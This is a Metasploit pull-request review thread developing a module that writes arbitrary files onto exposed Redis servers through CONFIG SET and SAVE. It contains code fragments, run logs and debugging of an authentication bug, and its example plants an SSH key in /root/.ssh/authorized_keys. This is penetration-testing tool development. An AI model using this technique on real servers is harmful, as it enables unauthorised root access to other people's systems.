### PR TITLE
Cleanup redis unauth_file_upload, move redis stuff to mixin

### PR DESCRIPTION
**Pull request by jhart-r7**
This PR addresses all of the feedback I had on https://github.com/rapid7/metasploit-framework/pull/6319 prior to you moving it to scanner as well as improving authentication, check, etc.

### CODE REVIEW

**Comment by all3g** [comment]
@jhart-r7  Thanks. Could we add a **```AUTH_KEY```** option for authentication test, and rename module name. **```AUTH_KEY```** is in [#6319](https://github.com/rapid7/metasploit-framework/pull/6319)

```
msf auxiliary(unauth_upload_file) > show options 

Module options (auxiliary/scanner/redis/unauth_upload_file):

   Name        Current Setting                 Required  Description
   ----        ---------------                 --------  -----------
   LocalFile   /home/notfound/.ssh/id_rsa.pub  no        Local file to be uploaded
   RHOSTS      192.168.1.104                   yes       The target address range or CIDR identifier
   RPORT       6379                            yes       The target port
   RemoteFile  /root/.ssh/authorized_keys      no        Remote file path
   THREADS     1                               yes       The number of concurrent threads

msf auxiliary(unauth_upload_file) > run 

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(unauth_upload_file) > set VERBOSE true
VERBOSE => true
msf auxiliary(unauth_upload_file) > run 

[*] 192.168.1.104:6379 -- redis command 'INFO' got '-NOAUTH\x20Authentication\x20required.'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

File: modules/auxiliary/scanner/redis/unauth_upload_file.rb [hunk 1]
```diff
@@ -0,0 +1,138 @@
...
+      )
+    )
+    register_options(
+      [
+        OptPath.new('LocalFile', [false, 'Local file to be uploaded']),
+        OptString.new('RemoteFile', [false, 'Remote file path'])
+      ]
+    )
+  end
+
```
Comment (all3g) [inline modules/auxiliary/scanner/redis/unauth_upload_file.rb]: Add a **```redis_auth?```** function for authentication test.
```
  def redis_auth?(password)
    # Request for authentication in a password-protected Redis server.
    # Redis can be instructed to require a password before allowing clients to
    # execute commands. This is done using requirepass directive in the
    # configuration file.
    #
    # If password matches the password in the configuration file, the server
    # replies with the OK status code and starts accepting commands.
    data = send_redis_command('AUTH', password)
    data && data.include?('+OK') ? true : false
  end
```

File: modules/auxiliary/scanner/redis/unauth_upload_file.rb [hunk 2]
```diff
@@ -0,0 +1,138 @@
...
+    send_redis_command('CONFIG', 'SET', 'dir', original_dir)
+    send_redis_command('CONFIG', 'SET', 'dbfilename', original_dbfilename)
+    send_redis_command('DEL', key)
+    send_redis_command('SAVE')
+  end
+
+  def check
+    connect
+    data = send_redis_command('INFO')
+    disconnect
```
Comment (all3g) [inline modules/auxiliary/scanner/redis/unauth_upload_file.rb]:
```
    connect
    data = send_redis_command('INFO')
    if data && /NOAUTH Authentication required/ =~ data
      data = send_redis_command('INFO') if redis_auth?(datastore['Password'])
    end
    disconnect
```

File: modules/auxiliary/scanner/redis/unauth_upload_file.rb [hunk 3]
```diff
@@ -0,0 +1,138 @@
...
+    connect
+    unless (res = send_redis_command('PING'))
+      vprint_error("#{peer} -- did not respond to our redis PING")
+      return
+    end
+
+    if res =~ /PONG/
+      vprint_good("#{peer} -- responded positively to our PONG")
+      send_file(datastore['RemoteFile'], @upload_content)
+    else
```
Comment (all3g) [inline modules/auxiliary/scanner/redis/unauth_upload_file.rb]:
```
    if res =~ /PONG/
      vprint_good("#{peer} -- responded positively to our PONG")
      send_file(datastore['RemoteFile'], @upload_content)
    elsif res =~ /NOAUTH Authentication required/ && redis_auth?(datastore['Password'])
      vprint_good("#{peer} -- responded to auth successfully")
      send_file(datastore['RemoteFile'], @upload_content)
    else
      vprint_good("#{peer} -- responded unknown to our PONG: #{res}")
    end
```

File: modules/auxiliary/scanner/redis/unauth_upload_file.rb [hunk 4]
```diff
@@ -0,0 +1,138 @@
...
+        'Targets'       => [['Automatic Target', {}]],
+        'Privileged'    => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Nov 11 2015'
+      )
+    )
+    register_options(
+      [
+        OptPath.new('LocalFile', [false, 'Local file to be uploaded']),
+        OptString.new('RemoteFile', [false, 'Remote file path'])
```
Comment (all3g) [inline modules/auxiliary/scanner/redis/unauth_upload_file.rb]:
```
    OptString.new('RemoteFile', [false, 'Remote file path']),        
    OptString.new('Password', [false, 'Redis password for autnentication test', 'foobared'])
```

**Comment by jhart-r7** [comment]
Thanks, will address.

**Comment by jhart-r7** [comment]
Thanks @all3g, I've made those changes and more.  Some things of note:

* The previous regex you were using to detect authentication wasn't working on my older 2.2.12 instance, so when I refactored this I added support for what you had and what works for me.
* I've removed the unnecessary calls to `PING`.  The user is only vulnerable if we can modify the configuration, and to do that I see if I can fetch it with `CONFIG GET *`.
* Authentication is handled automatically now when you call `redis_command`

Example run now:

```
resource (/tmp/redis.rc)> use auxiliary/scanner/redis/unauth_upload_file
resource (/tmp/redis.rc)> set RHOSTS 10.0.1.38
RHOSTS => 10.0.1.38
resource (/tmp/redis.rc)> check
[+] 10.0.1.38:6379 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
resource (/tmp/redis.rc)> run
[-] Auxiliary failed: RuntimeError bad-config: LocalFile must be set
[-] Call stack:
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-]   /home/jhart/rapid7/metasploit-framework/modules/auxiliary/scanner/redis/unauth_upload_file.rb:127:in `run_host'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:116:in `block (2 levels) in run'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
resource (/tmp/redis.rc)> set LocalFile /etc/hosts
LocalFile => /etc/hosts
resource (/tmp/redis.rc)> set RemoteFile /tmp/foo2
RemoteFile => /tmp/foo2
resource (/tmp/redis.rc)> run
[+] 10.0.1.38:6379 -- saved 228 bytes inside of redis DB at /tmp/foo2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (/tmp/redis.rc)> unset Password
Unsetting Password...
resource (/tmp/redis.rc)> run
[-] Auxiliary failed: RuntimeError bad-config: 10.0.1.38:6379 requires authentication but Password unset
[-] Call stack:
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/auxiliary/redis.rb:55:in `redis_command'
[-]   /home/jhart/rapid7/metasploit-framework/modules/auxiliary/scanner/redis/unauth_upload_file.rb:93:in `check'
[-]   /home/jhart/rapid7/metasploit-framework/modules/auxiliary/scanner/redis/unauth_upload_file.rb:129:in `run_host'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:116:in `block (2 levels) in run'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /home/jhart/rapid7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
resource (/tmp/redis.rc)> set Password wrong
Password => wrong
resource (/tmp/redis.rc)> run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Comment by all3g** [comment]
@jhart-r7 ,Thanks. When I try to check ```redis 2.8.17``` installed on Kali Linux, it says **"Check failed: NoMethodError undefined method `gsub' for nil:NilClass"**

```
msf auxiliary(unauth_upload_file) > show options 

Module options (auxiliary/scanner/redis/unauth_upload_file):

   Name        Current Setting                 Required  Description
   ----        ---------------                 --------  -----------
   LocalFile   /home/notfound/.ssh/id_rsa.pub  no        Local file to be uploaded
   RHOSTS      192.168.1.104                   yes       The target address range or CIDR identifier
   RPORT       6379                            yes       The target port
   RemoteFile  /root/.ssh/authorized_keys      no        Remote file path
   THREADS     1                               yes       The number of concurrent threads

msf auxiliary(unauth_upload_file) > check 

[*] 192.168.1.104:6379 -- requires authentication (NOAUTH Authentication required)
[-] 192.168.1.104:6379 - Check failed: NoMethodError undefined method `gsub' for nil:NilClass
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(unauth_upload_file) > set Password foobared
Password => foobared
msf auxiliary(unauth_upload_file) > check 

[*] 192.168.1.104:6379 -- requires authentication (NOAUTH Authentication required)
[-] 192.168.1.104:6379 - Check failed: NoMethodError undefined method `gsub' for nil:NilClass
[*] Checked 1 of 1 hosts (100% complete)
```

Redis outputs as follow:

```
┌─[]─[~]
└──╼ redis-cli -h 192.168.1.104
192.168.1.104:6379> INFO
NOAUTH Authentication required.
192.168.1.104:6379> AUTH foobared
OK
192.168.1.104:6379> INFO
# Server
redis_version:2.8.17
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:466577337ec40be1
redis_mode:standalone
os:Linux 4.0.0-kali1-686-pae i686
arch_bits:32
multiplexing_api:epoll
gcc_version:4.9.2
process_id:797
run_id:e71a454a07ce007f9872d655415a26a14db4a75f
tcp_port:6379
uptime_in_seconds:861
uptime_in_days:0
hz:10
lru_clock:7039375
config_file:/etc/redis/redis.conf
```

**Comment by jhart-r7** [comment]
Hmm.  I don't immediately see what the problem is.  I just tried this against a Kali 2.0 host also running 2.8.17 after enabling it to listen on a TCP port, regardless of whether or not the instance has a password configured, the module works for me when given the right options  I made a few small changes that may prevent the problem from happening for you but I'm not sure.  My latest change, if correct and I'm understanding the problem, will correct your problem but the module still won't work.  I suspect that you are not getting a response after authenticating when you try to send the commands performed during check.  But why I don't know.  I'll need your assistance debugging that.

**Comment by all3g** [comment]
[packets - redis.zip](https://github.com/open-security/metasploit-framework/files/60019/redis.zip). If you need ```redis.conf``` in Kali Lab, a copy can be here.

**Comment by all3g** [comment]
**```config_data = redis_command('CONFIG', 'GET', '*')```** returns nil,

```
From: /opt/metasploit-framework/modules/auxiliary/scanner/redis/unauth_upload_file.rb @ line 93 Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3#check:

     90: def check
     91:   connect
     92:   require 'pry'
 =>  93:   binding.pry
     94: 
     95:   # they are only vulnerable if we can run the CONFIG command, so try that
     96:   return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
     97: 
     98:   if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
     99:     report_redis(redis_version)
    100:   end
    101: 
    102:   Exploit::CheckCode::Vulnerable
    103: ensure
    104:   disconnect
    105: end

[1] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> config_data = redis_command('CONFIG', 'GET', '*')
=> nil
[2] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> config_data
=> nil
```

Next, we debug the redis.rb, and find that the second **```command_response```** returns nil, 

```
    52: def redis_command(*commands)
    53:   require 'pry'
 => 54:   binding.pry
    55:   return unless (command_response = send_redis_command(*commands))
    56:   if /(?<auth_response>ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response
    57:     fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password']
    58:     vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})")
    59:     if (auth_response = send_redis_command('AUTH', datastore['Password']))
    60:       unless auth_response =~ /\+OK/
    61:         vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}")
    62:         return
    63:       end
===>64:       command_response = send_redis_command(*commands)
    65:     else
    66:       vprint_status("#{peer} -- authentication failed; no response")
    67:       return
    68:     end
    69:   end
    70: 
    71:   return unless command_response
    72: 
    73:   vprint_status("#{peer} -- redis command '#{printable_redis_response(commands.join(' '))}' got '#{printable_redis_response(command_response)}'")
    74:   command_response
    75: end
```

```
[4] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> auth_response = send_redis_command('AUTH', datastore['Password'])
=> "+OK"
[5] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> command_response = send_redis_command(*commands)
=> nil
```

**Comment by jhart-r7** [comment]
Weird.  That aligns with what I see in the packet capture and what I tightened up, but I'm not sure why `command_response` is `nil`.   I definitely see the response in your pcap.  Currently baffled.

**Comment by all3g** [comment]
Msf module returns nil, but we can get correct result in debug console manually. What's the reason ?

```
msf auxiliary(unauth_upload_file) > check

From: /opt/metasploit-framework/lib/msf/core/auxiliary/redis.rb @ line 70 Msf::Auxiliary::Redis#redis_command:

    65:           end
    66:           vprint_status("#{peer} -- authenticated")
    67:           command_response = send_redis_command(*commands)
    68:           require 'pry'
    69:           binding.pry
 => 70:           unless (command_response)
    71:             vprint_error("#{peer} -- no response to '#{command_string}")
    72:             return
    73:           end
    74:         else
    75:           vprint_status("#{peer} -- authentication failed; no response")

[1] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> command_response
=> nil
[2] pry(#<Msf::Modules::Mod617578696c696172792f7363616e6e65722f72656469732f756e617574685f75706c6f61645f66696c65::Metasploit3>)> command_response = send_redis_command(*commands)
=> "ompression\r\n$3\r\nyes\r\n$11\r\nrdbchecksum\r\n$3\r\nyes\r\n$15\r\nactiverehashing\r\n$3\r\nyes\r\n$24\r\nrepl-disable-tcp-nodelay\r\n$2\r\nno\r\n$29\r\naof-rewrite-incremental-fsync\r\n$3\r\nyes\r\n$18\r\naof-load-truncated\r\n$3\r\nyes\r\n$10\r\nappendonly\r\n$2\r\nno\r\n$3\r\ndir\r\n$14\r\n/var/lib/redis\r\n$16\r\nmaxmemory-policy\r\n$10\r\nnoeviction\r\n$11\r\nappendfsync\r\n$8\r\neverysec\r\n$4\r\nsave\r\n$21\r\n900 1 300 10 60 10000\r\n$8\r\nloglevel\r\n$6\r\nnotice\r\n$26\r\nclient-output-buffer-limit\r\n$67\r\nnormal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60\r\n$14\r\nunixsocketperm\r\n$3\r\n700\r\n$7\r\nslaveof\r\n$0\r\n\r\n$22\r\nnotify-keyspace-events\r\n$0\r\n\r\n$4\r\nbind\r\n$7\r\n0.0.0.0"

```

**Comment by all3g** [comment]
@jhart-r7  Thanks. Please replace **```command_response.strip!```** with  **```command_response```**, and everything goes well.
```
    def send_redis_command(*command_parts)
      sock.put(redis_proto(command_parts))
      command_response = sock.get_once(-1, read_timeout)
      return unless command_response
      # command_response.strip!
      command_response
    end 
```

File: lib/msf/core/auxiliary/redis.rb [hunk 5]
```diff
@@ -0,0 +1,103 @@
...
+        command << "$#{c.length}\r\n#{c}\r\n"
+      end
+      command
+    end
+
+    def send_redis_command(*command_parts)
+      sock.put(redis_proto(command_parts))
+      command_response = sock.get_once(-1, read_timeout)
+      return unless command_response
+      command_response.strip!
```
Comment (all3g) [inline lib/msf/core/auxiliary/redis.rb]: please replace **```command_response.strip!```** with **```command_response```**

**Comment by jhart-r7** [comment]
Thanks, that looks like it could be the cause.  `String#strip!` returns `nil` if the string was unaltered, which could explain how that `nil` snuck in.  What is odd, though, is that your response to `CONFIG GET *` has a CR+LF at the end, as does mine.  I've replaced this with `strip` instead, which will not return `nil`.  Give that a try.

**Comment by all3g** [comment]
Thanks so much. I'm so happy to finish the module with you.

**Pull request merged**